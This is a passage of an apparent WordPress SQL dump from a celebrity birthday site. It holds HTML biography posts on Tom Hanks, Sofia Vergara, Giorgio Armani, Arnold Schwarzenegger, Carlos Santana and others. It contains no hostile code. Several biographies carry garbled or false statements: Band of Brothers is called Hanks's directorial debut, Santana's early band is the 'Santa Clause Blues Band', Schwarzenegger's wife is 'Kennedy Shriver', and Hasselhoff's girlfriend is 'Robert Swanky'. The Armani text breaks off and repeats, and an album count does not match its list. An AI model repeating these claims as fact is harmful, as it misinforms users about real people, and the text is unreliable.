enough and founded his own label, ‘Show Dog Nashville’, one that merged with Universal South Records, and through the merged label he has released seven complete studio albums which include:\r\n<ul>\r\n <li>White Trash with Money</li>\r\n <li>Big Dog Daddy</li>\r\n <li>That Don’t Make Me a Bad Guy</li>\r\n <li>American Ride</li>\r\n <li>Bullets in the Gun</li>\r\n <li>Clancy’s Tavern</li>\r\n <li>Hope on the Rocks</li>\r\n <li>Drinks After Work</li>\r\n</ul>\r\nHe also starred in the film Broken Bridges in 2006 and co-starred with Rodney Carrington in Beer for my Horses.\r\n\r\nAll in all Keith has released a total of seventeen studio albums, two Holiday albums, and four compilations. He has charted sixty singles on the Billboard Hot Country Songs Chart, with his longest lasting ones being ‘Beer for my Horses’ and ‘As Good as I Once Was’.\r\n<h2>Most Known For</h2>\r\nOne thing that Keith is widely known for is his song ‘Courtesy of the Red White and Blue’ which he wrote in the wake of 9/11. At first he refused to actually record the song and would only perform it for service members until a high ranking military officer told him that it was his duty as an American citizen to record the song. The Dixie Chicks, a female fronted country band at the time believed his song made country music look ‘stupid’, in their own words, and the lead singer began wearing a shirt that said “<a href=\"http://tasteofcountry.com/countrys-most-shocking-moments-natalie-maines-f-u-toby-keith-shirt/\" target=\"_blank\">FUTK</a>”, which is known to stand for ‘F*ck You Toby Keith’. Toby Keith eventually ended his feud with the Dixie Chicks, stating that there were more important things for him to focus on.\r\n<h2>Current Personal Life</h2>\r\nKeith was married to Tricia Lucus on March 24, 1984 and is the father of three children. In addition to that he now has one granddaughter and one grandson.\r\n<h2>Where Are They Now</h2>\r\nToby Keith is still touring and has several concert dates in the northeast.\r\n\r\n<a href=\"https://www.flickr.com/photos/mean_daddy/3752233475/sizes/o/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Toby Keith','','publish','open','open','','toby-keith','','','2015-10-14 18:24:12','2015-10-14 18:24:12','',0,'http://birthdaypedia.wpengine.com/?p=143',0,'post','',0),(144,2,'2015-07-09 08:44:04','2015-07-09 08:44:04','<h2>In the Beginning</h2>\r\nHe is a man that needs no introduction, but for those uninformed, <a href=\"http://www.tomhanks-online.com/\" target=\"_blank\">Tom Hanks</a> was born July 9, 1956 to Janet Marylyn and Amos Mefford Hanks. His brothers and sisters all became noteworthy individuals, his sister becoming a writer, and the youngest becoming both an actor and filmmaker. The family was split up when Hanks parents divorced in 1960 with his sister Sandra , brother Larry, and himself going with their father. His teen years were painful, as he recalled, even stating: \"I was a geek, a spaz. I was horribly, painfully, terribly shy. At the same time, I was the guy who\'d yell out funny captions during filmstrips. But I didn\'t get into trouble. I was always a real good kid and pretty responsible.\" when he gave an interview to rolling stone magazine. His father, Amos, remarried in 1965 to Frances Wong. During his high school years, Hanks would act in several school plays, and upon graduating, he would study theater at Chabot College in Hayward. He then transferred to <a href=\"http://www.calstate.edu/\" target=\"_blank\">California State University</a>.\r\n\r\nHanks admittedly spent a lot of time at the theater watching various plays including Brecht, Tennessee Williams, Isben, etc. The years wore on, of course, and Hanks spent the vast majority of his time studying theater. He met Vincent Dowling, the head of the Great Lakes Theater Festival in Cleveland Ohio who suggested Hanks actually become an intern there. He accepted the offer and from this three year experience he learned most everything he needed to know about theater production. Once he had learned everything he believed he needed to know about theater, he dropped out of college and went into the field full time.\r\n\r\nAfter dropping out of college, or rather around the same time, hanks won the Cleveland Critics Circle Award for Best Actor, having filled the role of Proteus in The Two Gentlemen of Verona, a play by William Shakespeare himself. This is notable one of the few times that Hanks played a villain.\r\n<h2>Career Accomplishments</h2>\r\nTom Hanks has appeared in a great number of films since his early days, some of which have been the recipient of several awards. The Green Mile, for example, was an adaptation of a Stephen King novel and has been highly regarded. Some of his most notable movies include:\r\n<ul>\r\n <li>Big</li>\r\n <li><a href=\"http://www.imdb.com/title/tt0107818/\" target=\"_blank\">Philadelphia</a></li>\r\n <li>You’ve Got Mail</li>\r\n <li>The Green Mile</li>\r\n <li>Cast Away</li>\r\n <li>The Da Vinci Code</li>\r\n <li>Captain Philips</li>\r\n <li>Saving Mr. Banks</li>\r\n <li>The Polar Express</li>\r\n <li>Toy Story</li>\r\n</ul>\r\nOver the course of his career, Hanks has been nominated for several different awards. For his role in Philadelphia he won a Golden Globe award as well as an Academy Award for Best Actor in Philadelphia. Additionally, he won several awards for his hit movie Forrest Gump. Some of his other movies included Catch Me if you Can, Saving Private Ryan, The terminal, and Bridge of spies. Hanks saw his directorial debut in the HBO miniseries Band of Brothers. Hanks is considered to be one of the highest grossing actors in the industry having grossed $8.4 billion worldwide, setting and breaking several records.\r\n\r\nHanks has been nominated for numerous awards during his career. He won a <a href=\"https://en.wikipedia.org/wiki/Golden_Globe_Award\" target=\"_blank\">Golden Globe Award</a> and an Academy Award for Best Actor for his role in <em>Philadelphia</em>, as well as a Golden Globe, an Academy Award, a Screen Actors Guild Award, and a People\'s Choice Award for Best Actor for his role in <em>Forrest Gump</em>. In 2004, he received the Stanley Kubrick Britannia Award for Excellence in Film from the British Academy of Film and Television Arts (BAFTA).\r\n<h2>Most Known For</h2>\r\nTom Hanks holds the rank of second highest all-time box office star right after Samuel L. Jackson. 17 films with his involvement have grossed more than $100 million, the highest grossing being Toy Story 3 from 2010. Just when it seems Tom Hanks couldn’t rise any higher, he reaches for space.\r\n\r\nOne of the most interesting things about Tom Hanks is that there is an asteroid named after him, 12818 Tomhanks. In addition to that he is a strong supporter of NASA’s manned space program. He has expressed that he originally wanted to be an astronaut, but the math was simply beyond him. Hanks has been involved in several film projects involving space travel including an HBO miniseries called ‘From the Earth to the Moon’. Additionally, he provided voice over work for the show Passport to the Universe at the Rose Center for Earth and Space in New York.\r\n<h2>Current Personal Life</h2>\r\nInitiating his second marriage, Hanks married actress Rita Wilson in 1988 and they currently have two sons together.\r\n<h2>Where Are They Now</h2>\r\nHanks is still acting and maintains and active social media presence for his fans.\r\n\r\n[<a href=\"https://www.flickr.com/photos/o2de/8160611552/sizes/c/\" target=\"_blank\">Image</a>]','Tom Hanks','','publish','open','open','','tom-hanks','','','2015-10-14 18:24:42','2015-10-14 18:24:42','',0,'http://birthdaypedia.wpengine.com/?p=144',0,'post','',0),(146,2,'2015-07-10 07:56:43','2015-07-10 07:56:43','<h2>In the Beginning</h2>\r\nSofía Margarita Vergara was born on July 10, 1972 to a Roman Catholic family in <a href=\"https://www.cia.gov/library/publications/the-world-factbook/geos/co.html\" target=\"_blank\">Colombia</a>. Her parents were Margarita Vergara Dávila de Vergara and Julio Enrique Vergara Robayo who worked as a cattle producer in the meat industry. During her childhood she was called Toti by her siblings, including several of her cousins.\r\n\r\nFollowing her formative years she studied dentistry at a Colombia university, but shortly before she would have been handed her degree, she left the dentistry field and decided to go into show business. Part of her decision to abandon her degree and move was influenced by the unrest in Colombia, her brother having been murdered during a kidnapping attempt.\r\n<h2>Career Accomplishments</h2>\r\nThough she is now primarily an American actress, Vergara was first discovered in her home country of Colombia, particularly when she was seen by a photographer on a Colombian beach. She was quickly offered work in television as well as modeling. Though she was hesitant to take on the job due to her catholic upbringing, her teachers gave her the green light, and at the age of seventeen, she performed in a <a href=\"http://dailycaller.com/2015/05/06/heres-the-pepsi-commercial-that-made-a-bikini-clad-sofia-vergara-famous-video/\" target=\"_blank\">Pepsi commercial broadcast</a> across Latin America. Vergara was on her way to fame.\r\n\r\nWhen she was twenty years old, she moved to Bogota, Colombia where she would work as both a runway model and television actress, though she didn’t quite have a leading role yet. Instead, she co-hosted a travel television series where she would visit exotic locations across the world. Though she wasn’t leading, she did gain exposure in the United States and eventually appeared as a guest star in the HBO series Entourage. In addition to that she posed for several swimsuit calendars over the years.\r\n\r\nIn 2007 she would play Alice Oviedo in Amas de Casa Desesperadas, which was the Colombian version of Desperate housewives.\r\n\r\nVergara was eventually able to sign a contract with the <a href=\"http://abc.go.com/shows/modern-family\" target=\"_blank\">ABC network</a> in the United States, bringing her to televisions across the world. She appeared on a number of different shows including Hot Properties and The Knights of Prosperity. Right now, she is starring on Modern Family as Gloria Delgado-Pritchett. For this role she was nominated for the Primetime Emmy Award for Outstanding Supporting Actress in a comedy series.\r\n\r\nNot all of her arrangements were a success of course. In 2011, she was slated to star in an independent Drama called ‘The Paperboy’ but a conflict with her Modern Family schedule forced her to leave the project. She did, however, find time to star in another film, The Three Stooges, in 2011. Since then she has appeared in her son Manolo’s web series, and has been named one of People Magazine’s top 50 most Beautiful people. She has also been recognized by the Hollywood Reporter and Billboard, being one of the most influential Latin women in Hollywood.\r\n<h2>Most Known For</h2>\r\nVergara is known for a number of different things in her career, most notably being the <a href=\"http://variety.com/gallery/top-10-latino-actors-and-actresses/\" target=\"_blank\">most influential Latin American in Hollywood</a>. In addition to that she stars on the popular Modern Family television show which has captured the attention of much of North America. Because of her role in the show she has won four Golden Globe Awards, four Primetime Emmy Awards, and seven Screen Actors Guild Awards. In addition to that, she was ranked the 32<sup>nd</sup> most powerful woman in the world by Forbes.\r\n\r\nFinally, and perhaps most importantly, Vergara received a star on the Hollywood Walk of Fame, May 7, 2015.\r\n<h2>Current Personal Life</h2>\r\nIn her current personal life, Vergara began dating Joe Manganiello, a star on the hit show ‘True Blood’, and after six months of dating, they announced that they had become engaged on Christmas Day, 2014. In addition to becoming engaged, she also announced that she had scored a 100% on her American citizenship test, which allowed her to become a full citizen.\r\n<h2>Where Are They Now</h2>\r\nVergara is still making routine appearances on ABC’s <a href=\"http://www.tv.com/shows/modern-family/reviews/\" target=\"_blank\">modern family</a>.\r\n\r\n[<a href=\"https://www.flickr.com/photos/disneyabc/14973565397/sizes/z/\" target=\"_blank\">Image</a>]','Sofia Vergara','','publish','open','open','','sofia-vergara','','','2015-10-14 18:25:08','2015-10-14 18:25:08','',0,'http://birthdaypedia.wpengine.com/?p=146',0,'post','',0),(147,2,'2015-07-17 04:12:34','2015-07-17 04:12:34','','Sofia Vergara','','inherit','open','open','','sofia-vergara','','','2015-07-17 04:12:44','2015-07-17 04:12:44','',146,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Sofia-Vergara.jpg',0,'attachment','image/jpeg',0),(148,2,'2015-07-13 07:13:03','2015-07-13 07:13:03','<h2>In the Beginning</h2>\r\n<a href=\"http://www.armani.com/us/giorgioarmani\" target=\"_blank\">Giorgio Armani</a> was born in a small Italian town called <a href=\"http://www.tripadvisor.com/Tourism-g187805-Piacenza_Province_of_Piacenza_Emilia_Romagna-Vacations.html\" target=\"_blank\">Piacenza</a>, raised with an older brother and younger sister. His parents raised him together throughout his years in secondary school. Armani wished to pursue a career in medicine, and as such, he chose to enroll in the Department of Medicine at the University of Milan. After three years however, he made the decision to leave school and join the military. If he was making an attempt to escape the medical profession he was sorely mistaken as the army assigned him to work in the military hospital in Verona. While there, he would attend shows at the arena, and final, begin to consider an entirely different career path.\r\n<h2>Career Accomplishments</h2>\r\nFollowing his foray into the armed forces, Armani took on a job as a window dresser at La Rinascente, a Milan department store. Shortly after he found himself a salesperson for the menswear department where he learned a plethora about the marketing aspect of the fashion industry. He did not stay with La Rinascente forever, obviously, and in the mid-sixties he moved to Nino Cerutti where he took up an entirely new profession: designing menswear. At the time, menswear and men’s styles in general were extremely lacking as all of the work seemed to go into women’s clothing. That being said, Armani’s talents were in high demand. In addition to working for Cerutti, he did freelance work, providing designs for up to ten manufacturers at a time. As 1960 nearly drew to a close, Armani met with Sergio Galeotti, and architectural draftsman. There are some meetings in our lives that define the rest of our lives, and this was one of them. Galeotti, in 1973, convinced Armani to open his very own office in Milan, which led to a period of collaboration between Armani and several other companies including Hilton, Scions, Gibo, and even Tendresse. Armani’s rise to fame was swift from here as he was featured on several <a href=\"http://www.style.com/fashion-shows/fall-2015-ready-to-wear/giorgio-armani\" target=\"_blank\">runway shows</a>, and this experience allowed him to begin experimenting with his own style in many different ways. Rather than focusing on working at a department store, he was finally able to realize his dream and was well on his way to becoming the fashion designer that we know and love. In mid 1975, Armani founded Giorgio Armani S.p.A in Milan alongside Galeotti. In 1976 he was ready to produce his first line of both men’s AND women’s clothing.\r\n\r\nWith the clothing industry, Armani would develop an innovative relationship, and he quickly began producing for the United States. Now he was far more than a local clothing manufacturer – he had moved to the international stage and all eyes were upon both him and his work. The Armani label quickly became known all over the world\r\n\r\n1n 1988 Armani crossed the Silk Road, opening a <a href=\"http://www.prnewswire.com/news-releases/giorgio-armani-makes-historic-trip-to-china-for-flagship-shanghai-store-opening-72468387.html\" target=\"_blank\">store in China</a>. It was a small shop, but it was quickly followed by a flagship store in Shanghai n 2004. As of right now, Armani plans to establish even more. As of the year 2009, Armani was responsible for a retail network that included 60 Armani Boutiques, 11 Collezioni, 122 Emporio Armani, an\r\n\r\nAs of 2009, Armani has a retail network of 60 Giorgio Armani boutiques, 11 Collezioni, 122 Emporio Armani, 94 A/X Armani exchange, 1 Giorgio Armani Accessori, and 13 Armani Junior stores spread over 37 different countries.\r\n\r\nIn 2009 it had been confirmed thtat the network had grown to more than 60 boutiques, 11 Collezioni, and 1 Armani Junior store of a total of thirty-seven countries.\r\n<h2>Most Known For</h2>\r\nArmani is most known for launching an international clothing line that changed the way we look at clothing forever.\r\n<h2>Current Personal Life</h2>\r\nHe claims to live a fairly boring personal life and tends to stay out of the limelight for the most part.\r\n<h2>Where Are They Now</h2>\r\nArmani is still designing clothes for both casual and formal wear.\r\n\r\n[<a href=\"https://www.flickr.com/photos/br1dotcom/3907239185/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Giorgio Armani','','publish','open','open','','giorgio-armani','','','2015-10-14 18:26:10','2015-10-14 18:26:10','',0,'http://birthdaypedia.wpengine.com/?p=148',0,'post','',0),(149,2,'2015-07-17 04:25:04','2015-07-17 04:25:04','','Giorgio Armani','','inherit','open','open','','giorgio-armani','','','2015-07-17 04:25:15','2015-07-17 04:25:15','',148,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Giorgio-Armani.jpg',0,'attachment','image/jpeg',0),(150,2,'2015-07-14 08:25:49','2015-07-14 08:25:49','<h2>In the Beginning</h2>\r\nMatthew Chandler Fox was born July 15, 1966 and is an American actor known for a number of different roles including several high grossing television shows. He was born in <a href=\"http://www.abingtonfreelibrary.org/\" target=\"_blank\">Abington</a>, Pennsylvania, the son of Loretta B. and Francis G. Fox. His family was mostly of English descent, though his mother was half Italian. At one year old, his family moved to Wyoming and settled in Crowheart on the Wind River Indian Reservation. His mother was a teacher, and his father performed multiple jobs.\r\n\r\nHe raised livestock, consulted for an oil company, and even grew barley in exchange for Coors beer. When he was younger, Fox’s parents worked as caretakers for the Bitterroot Ranch outside of Dubois. His childhood was relatively normal, and he graduated from a Wyoming high school. Following high school he attended Deerfield academy for a post-graduate year, and then moved on to Colombia University, majoring in Economics. He also played football,a nd became a brother of the Phi Gamma Delta Fraternity.\r\n<h2>Career Accomplishments</h2>\r\nThe first performance that Fox ever gave was in a student film which can still be viewed online, and at the age of 25, he made his television debit on an episode of the popular sitcom, Wings. His first starting role came shortly after on a television drama called Freshman Dorm, which was short lived to say the least. While that role might have faded, he went on to play the role of <a href=\"https://en.wikipedia.org/wiki/CBS_Schoolbreak_Special\" target=\"_blank\">Charlie</a> in the CBS Schoolbreak special series. Because he never spent much time in the spotlight however, he was never actually given a recurring or starring role. He was, however, cast in more than a few supporting roles which would help to increase his fame and give him the exposure that he needed. He was eventually given a chance on the big screen with the movie ‘My Boyfriend’s Back’ in 1993.\r\n\r\nHe got his big break in 1994 with the Fox show, Party of Five, a teen drama that started in 1990. He played Charlie Salinger, the eldest of five brothers and sisters who lost their parents in a car accident. He co-starred with several who would go on to become big names in the industry including Scott Wolf, Neve Campbell, Jenifer Love Hewitt, and lacey Chabert. In 1996, People Magazine named him one of the 50 most beautiful people in the world. Party of Five was cancelled after its sixth season, and Fox went to another TV series, Haunted, in 2002.\r\n\r\nIn 2004 Fox played the role that he is now most known for: Dr. Jack Shephard on <a href=\"http://www.imdb.com/title/tt0411008/\" target=\"_blank\">Lost</a>. Originally he auditioned for the role of James Ford, or Sawyer, but J. J. Abrams decided he would work far better in the role of Jack, and let’s just say we’re all glad he made that decision. Originally, Jack was supposed to star in only the pilot episode, but obviously, he lasted from 2004 to 2010. In addition to that he was nominated for a Golden Globe and won the 2005 Satellite Award in 2005 for his role in Lost. Famously, Fox stated that after Lost he wa done with television and would only star in movies. So far, he has kept that promise. In 2011 he starred in a stage play, ‘In a Forest, Dark and Deep’ with Olivia Williams.\r\n\r\nOn December 2, 2006, Fox served as the host for Saturday Night Live alongside several other stars, and he played a small part in the action film Smokin’ Aces. He also starred in Vantage Point in 2008, and Racer X in the movie Speed Racer based on a popular anime.\r\n\r\nHe has appeared in several other movies, one of which was Alex Cross, and another being World War Z.\r\n<h2>Most Known For</h2>\r\nMatt Fox is currently best known for his starring role on Lost. Though there were many other actors on the show, it could be argued that he was essentially the main character.\r\n<h2>Current Personal Life</h2>\r\nFox has run into a bit of legal trouble having been pulled over for drunk driving, and having been <a href=\"http://www.people.com/people/article/0,,20639670,00.html\" target=\"_blank\">arrested</a> for punching out a bus driver.\r\n<h2>Where Are They Now</h2>\r\nHe is still an actor and is involved in a project called Welcome to Harmony.\r\n\r\n[<a href=\"https://www.flickr.com/photos/sunrise7/2217883164/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Matthew Fox','','publish','open','open','','matthew-fox','','','2015-10-14 18:29:39','2015-10-14 18:29:39','',0,'http://birthdaypedia.wpengine.com/?p=150',0,'post','',0),(152,2,'2015-07-30 07:35:50','2015-07-30 07:35:50','Born on July 30, 1947, in Austria, <a href=\"http://www.imdb.com/name/nm0000216/\" target=\"_blank\">Arnold Schwarzenegger</a> is a film actor and once a governor who rose to fame as one of the top bodybuilders in the world. His childhood life was far from ideal. Gustav, his father, was a police chief struggling with alcohol addiction, and who seemed to favor Arnold’s brother over his less athletic son. He always ridiculed at his son’s early dreams of becoming one of the top body builders, not knowing that it was in his blood.\r\n\r\nAs an escape, Arnold turned to films, in particular a body builder in B-level Hercules movies. Instead on taking comfort on his own home and family, he found his answers in a man behind International Federation of Body building, Joe Wider, when he immigrated to the U.S. in 1968. Joe showed a lot of love to Arnold; love that he didn’t get back home. He saw the potential in him, which would later see the young body builder win five Mr. Universities titles as well as six Mr. Olympia titles.\r\n<h2>Career Accomplishments</h2>\r\nArnold had always dreamt of making a big name for himself in Hollywood back when he was still in his hometown of Graz. With his fast ascension to the top bodybuilders globally, it was just a matter of time before he would move over and earn his much-needed acclaim in the big screen. After taking up small scenes in the 1976 movie Stay Hungry, Arnold finally received an award for Best Newcomer. His intense physical size and strength attracted leading figures in the film industry, who wanted to feature him in action films. In 1980s, Arnold became very popular, especially with his performance in films like Conan the Barbarian, <a href=\"http://terminator.wikia.com/wiki/Category:Films\" target=\"_blank\">The Terminator</a> and The Terminator 2.\r\n\r\nArnold’s American story sounded unbelievable, except to people who knew him. After years of success in making top action films, he decided to take a break and instead try politics. In 2003 he showed his resolve for success when he announced that he would throw his hat into the ring and compete for the governor of California. As expected, he won the seat in what many called a special election. The newly elected Republican promised his people to bring more economic stability to the state, which he did by introducing unique confidence to the new job.\r\n<h2>Most Known for</h2>\r\nArnold Schwarzenegger gained international stardom as a <a href=\"http://www.bodybuilding.com/fun/15-things-that-made-arnold-schwarzenegger-great.html\" target=\"_blank\">bodybuilder</a>, a career that would later see him become one of the most celebrated Hollywood actors. He is best known for his performance in action movies such as Conan the Barbarian, The Terminator 1 and 2, and Predator, not to forget his two terms as the governor of <a href=\"https://birthdaypedia.com/paula-abdul/\">California</a>.\r\n<h2>Current Personal Life</h2>\r\nArnold tied the knot with daughter of R. Sergeant Shriver, Kennedy Shriver, with whom he had four children: Christopher, Patrick, Christina, and Katherine. In May 2011, the couple announced their decision to separate following news that Arnold had been fathering a baby with one of the members belonging to the household staff of the family.\r\n<h2>Where is he now</h2>\r\nCurrently, Arnold Schwarzenegger lives in the city of Los Angeles, California. He also has a home in Ketchum, Idaho. After his two terms as the governor of California, he announced that he was willing to continue his career as an actor, working on more action films.\r\n\r\n<a href=\"https://www.flickr.com/photos/un_photo/4081317502/sizes/o/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Arnold Schwarzenegger','','publish','open','open','','arnold-schwarzenegger','','','2015-10-09 18:41:57','2015-10-09 18:41:57','',0,'http://birthdaypedia.wpengine.com/?p=152',0,'post','',0),(153,2,'2015-07-20 07:42:40','2015-07-20 07:42:40','<a href=\"http://www.biography.com/people/carlos-santana-9542276\" target=\"_blank\">Carlos Santana</a> was born in Autlan de Navarro, Mexico on July 20, 1947. He studied in Mexico and in 1960s he later moved to San Francisco, where he formed a band called the Santa Clause Blues Band. In 1970s to early 80s, the band released a number of successful hits, which saw the members receive Lifetime Achievement Award. Things became better for the band, and in 2013 it became the recipient of <a href=\"http://www.kennedy-center.org/programs/specialevents/honors/history.cfm\" target=\"_blank\">Kennedy Center Honors</a>.\r\n\r\nAs a teenager, Carlos started performing in strip clubs in Tijuana, inspired by blues and American rock & roll of artists such as Little Richard and Ray Charles. On arriving in San Francisco, Santana was introduced to a number of new musical influences, like international folk music as well as jazz. He played for spare change on San Francisco’s streets before becoming a fulltime musician, forming the band with fellow street artists, Gregg Rollie and David Brown.\r\n<h2>Career Accomplishments</h2>\r\nSantana gained an instant following in the club scene of San Francisco, with memorable performances such as the Woodstock in 1969. Their first album known as Santana included a single, Evil Ways, which made it to top 10 Billboard chart, selling over 4 million records. In 1970 the band released Abraxas, which went platinum and gave them popular success.\r\n\r\nAs the personnel of the band changed frequently, the band came to be associated with Santana himself, who with time became the only member of the original trio. In addition to the incredible work he had done with his band, Carlos went ahead to record and perform with several other artists, notably guitarist John McLaughlin, pianist Herbie Hancock, and drummer Buddy Miles. Together they marked a popular jazz album titled Love Devotion in 1973.\r\n\r\nCarlos Santana earned critical acclaim particularly for his solo album entitled Blues for Salvador, which he released in 1987. This album would later see him land the very first Grammy Award for the Best Instrumental Performance. Popularity of the album gave him a chance to tour extensively and be involved in tours such as the 1986 Amnesty International and 1985 LiveAid.\r\n\r\nNominated in 9 different Grammy Awards categories including Song of the Year, Record of The Year, and Album of the Year, Santana clinched awards in every category. The interesting thing is that he tied the 1983 Michael Jackson’s record for most <a href=\"https://www.grammy.com/photos/carlos-santana-3\" target=\"_blank\">Grammy Awards</a> in one year.\r\n<h2>Most Known for</h2>\r\nGuitarist Carlos Santana is best known for his jazz hits throughout the 70s and 80s. He is leader of a band, Santana, whose music blends African rhythms, salsa, jazz, and Latin-infused rock. Some of the band’s singles that made it to the charts include Evil Ways, <a href=\"http://www.songsterr.com/a/wsa/carlos-santana-black-magic-woman-tab-s357t0\" target=\"_blank\">Black Magic Woman</a>, and Oye Como Va.\r\n<h2>Current Personal Life</h2>\r\nCarlos Santana married Deborah in 1973 and had 3 children: Angelica, Stella and Salvador. However, things didn’t go very well as he and his wife decided to file for divorce on October 2007, citing “irresponsible differences.” Carlos was later engaged to Cindy Blackman, one of his band members, and the two got married in December 2010.\r\n<h2>Where is he now</h2>\r\nSantana together with his wife Cindy Blackman live in the city of Las Vegas. Although he doesn’t release any more hits, he is actively involved with music, having particular interest in Jazz music. His uniquely recognizable sound is definitely legendary.\r\n\r\n[<a href=\"https://www.flickr.com/photos/badosa/9488652992/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Carlos Santana','','publish','open','open','','carlos-santana','','','2015-10-14 18:43:30','2015-10-14 18:43:30','',0,'http://birthdaypedia.wpengine.com/?p=153',0,'post','',0),(154,2,'2015-07-17 04:51:28','2015-07-17 04:51:28','','Carlos Santana','','inherit','open','open','','carlos-santana','','','2015-07-17 04:51:38','2015-07-17 04:51:38','',153,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Carlos-Santana.jpg',0,'attachment','image/jpeg',0),(155,2,'2015-07-23 07:08:31','2015-07-23 07:08:31','Being the only child of a casting director and literary agent, <a href=\"http://www.imdb.com/name/nm0705356/\" target=\"_blank\">Daniel Radcliffe</a> was born on July 23, 1989. He has achieved global stardom for his role in Harry Potter films released in November 2001. People adored him as the lead actor, taking up the role of an orphaned boy who goes for training in a special school of wizards. With every film released, the fever and popularity of the series grew with time, spanning over a decade of his life. In the real sense, the series clearly shows Daniel grow from a teen to a young man, offering him a rear opportunity to work with renowned actors, such as Helena Bonham, Emma Thompson, Alan Rickman, and Gary Oldman.\r\n\r\nWhile many people would come to the conclusion that Radcliffe has lost most of his youth to success and fame, he too has had his share of troubles over the years. He admitted that he had a problem with alcohol during his teen, which sometimes led him to appear occasionally to film series while he was still drunk. However, since 2010 he has been sober.\r\n<h2>Career Accomplishments</h2>\r\nDaniel Radcliffe has enjoyed enormous success since he was just a teen. Since 2001, he has made news as one of the best teen actors globally, with many books written about the films he made. When the series ended with Pat 2 of <a href=\"http://www.goodreads.com/work/quotes/2963218-harry-potter-and-the-deathly-hallows\" target=\"_blank\">Harry Potter & the Deathly Hallows</a>, it was reported that the film brought in approximately 168 million dollars in just the opening weekend. However, this final movie came with some sad good-byes. Daniel had to set his famous character, Harry Potter, to rest, which meant that he would be missing in the entertainment industry.\r\n\r\nIn his life outside Harry Potter movies, Daniel has also tried various roles in other films. In 2006 he was offered a special spot in the comedy Extras, and then <a href=\"http://simplydanielradcliffe.com/gallery-update/equus-broadway-stills\" target=\"_blank\">Equus</a>, where he played the part of a disturbed teenager. Other notable films and shows he has been involved with include The Woman in Black, Saturday Night Live, A Young Doctor’s Notebook, Kill your Darlings in 20013, Horns, and What If.\r\n<h2>Most Known for</h2>\r\nDaniel Radcliffe rose to global stardom when he took up the role of Harry Potter in the film series based on J.K. Rowling books. As a young man, he proved he had talent to take up the character in the series, which saw him succeed in the film industry. He’s also hosted Saturday Night Live and starred in Films such as Kill your Darlings, Horns, and What If.\r\n<h2>Current Personal Life</h2>\r\nBeing one of the most recognized actors in the world, Radcliffe leads a normal life. Currently he supports a charity known as <a href=\"https://www.demelza.org.uk/\" target=\"_blank\">Damelza House Children’s Hospice</a> that cares for terminally-ill kids in Kent and South London. He asks his fans to remember donating to charity on his birthday as well as Christmas instead of sending him many gifts.\r\n<h2>Where is he now</h2>\r\nRadcliffe lives in <a href=\"http://www.nycgo.com/manhattan\" target=\"_blank\">Manhattan</a>, New York. He also has a penthouse apartment located in Melbourne, which he had put up for sale in February, 2015, but he unlisted it later on.\r\n\r\n<a href=\"https://www.flickr.com/photos/maggierda/2662317037/sizes/z/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Daniel Radcliffe','','publish','open','open','','daniel-radcliffe','','','2015-10-09 19:21:43','2015-10-09 19:21:43','',0,'http://birthdaypedia.wpengine.com/?p=155',0,'post','',0),(156,2,'2015-07-17 09:28:00','2015-07-17 09:28:00','Director, actor, musician and producer; David Hasselhoff was born on July 17, 1952 in the city of Baltimore, Maryland. The youngster, as a child, was interested in dancing, singing and acting. He was enrolled at the Academy of Dramatic Arts located in Michigan and thereafter at the California Institute of Arts found in Valencia. In 1973, early success kicked in Hasselhoff he was offered a role on The Young and The Restless, a famous soap opera.\r\n\r\nHasselhoff decided to move to prime time in 1982 where he stared in Knight Rider. His character of Michael Knight fought various types of crimes with the help of veteran actor William Daniels in a series that became a big success in the U.S, making one of the most famous actors on Television. In 1986, the series later ended, but this did not mean that Hasselhoff would go off air for a long time. He returned to television in 1989 to star and produce <a href=\"https://en.wikipedia.org/wiki/Baywatch\" target=\"_blank\">Baywatch</a>, a famous series, together with Pamela Anderson, Carmen, and Yasmine Bleeth.\r\n<h2>Career Accomplishments</h2>\r\nAfter the end of Baywatch, David was involved in other projects, such as Hyde and Jekyll in 2000, taking the title character in both. Since then he has appeared in many theatrical productions, which include 2007’s The Producer and America’s Got Talent. The series made him realize that he could branch out and try reality television, which prompted him to start a short-lives series known as The Hasselhoffs. That same year he also showed his great footwork as one of the contestants on the TV show <a href=\"http://www.nydailynews.com/entertainment/tv-movies/dancing-stars-results-david-hasselhoff-kym-johnson-eliminated-bombing-article-1.440302\" target=\"_blank\">Dancing with the Stars</a>. The competition also included other stars such as Michael Bolton, Florence Henderson, and Bristol Palin.\r\n\r\nSince 2010 Hasselholff continues to showcase his remarkable talent in theater and television. He even performed at the Edinburgh Fringe Festival, a show held in 2012. That same year, he also appeared in The Celebrity Apprentice, the Australian Version.\r\n<h2>Most Known For</h2>\r\nMany know Hasselhoff as an incredible actor and dancer. He is a big TV personality who hot big with 2-wildly successful shows: Baywatch and <a href=\"http://www.nbc.com/classic-tv/knight-rider\" target=\"_blank\">Knight Rider</a>. His role in the TV show Dancing With the Stars and The Celebrity Apprentice also made him very popular not only in the U.S, but also the world at large.\r\n<h2>Current Personal Life</h2>\r\nDavid is an outdoor-sport enthusiast with interests in jogging, tennis, rafting, hiking, and scuba diving. In 1980s, he was married to <a href=\"http://www.catherinehickland.com/\" target=\"_blank\">Catherine Hickland</a>, and actress, but unfortunately their reunion ended in a divorce. In 1989 he went ahead with his love life and married Pamela Bach, also an actress, with whom he had 2 daughters: Hayley Amber and Taylor Ann. In 2006, David filed a divorce, which took years to finalize. Today the actor is not married but has a girlfriend known as Robert Swanky.\r\n<h2>Where is he now</h2>\r\nDavid Hasselhoff lives in a mansion in California. However, in May there were reports that he had put his house, which he shares with his girlfriend, on sale for 2.3 million dollars.\r\n\r\n[<a href=\"https://www.flickr.com/photos/re-publica/14121627972/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','David Hasselhoff','','publish','open','open','','david-hasselhoff','','','2015-10-14 18:42:25','2015-10-14 18:42:25','',0,'http://birthdaypedia.wpengine.com/?p=156',0,'post','',0),(157,2,'2015-07-17 14:35:05','2015-07-17 14:35:05','','David Hasselhoff','','inherit','open','open','','david-hasselhoff','','','2015-07-17 14:35:10','2015-07-17 